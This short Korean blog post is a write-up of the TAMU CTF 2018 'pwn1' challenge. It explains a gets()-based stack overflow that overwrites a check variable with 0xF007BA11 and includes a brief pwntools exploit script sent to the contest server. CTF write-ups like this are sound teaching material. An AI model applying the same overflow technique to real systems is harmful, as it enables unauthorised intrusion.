Pwnable/write up
[TAMU ctf 2018] pwn1
xxvd
2018. 5. 17. 00:54
되게 오래 전에 했던 tamu ctf인데 대회 당시에는 1,2,4번 밖에 못풀어서 다시 풀고 라업 씁니다,,
문자열 s를 gets로 받는데 v5가 0xF007BA11 이면 print_flag() 함수를 출력해주기 때문에 overflow 시키고 v5를 0xF007BA11로 바꿔주면 돼요
대회 당시엔 이렇게 풀었습니다만,, 심심해서 익스코드도 짜봤습니다,, 뭐 딱히 할 것도 없었지만
1 2 3 4 5 6 7 8 9 10 11 12 13 | from pwn import * s = remote("pwn.ctf.tamu.edu",4321) payload="" payload+="\x90"*23 payload+=p32(0xF007BA11) sleep(0.5) s.sendline(payload) print s.recv() | cs |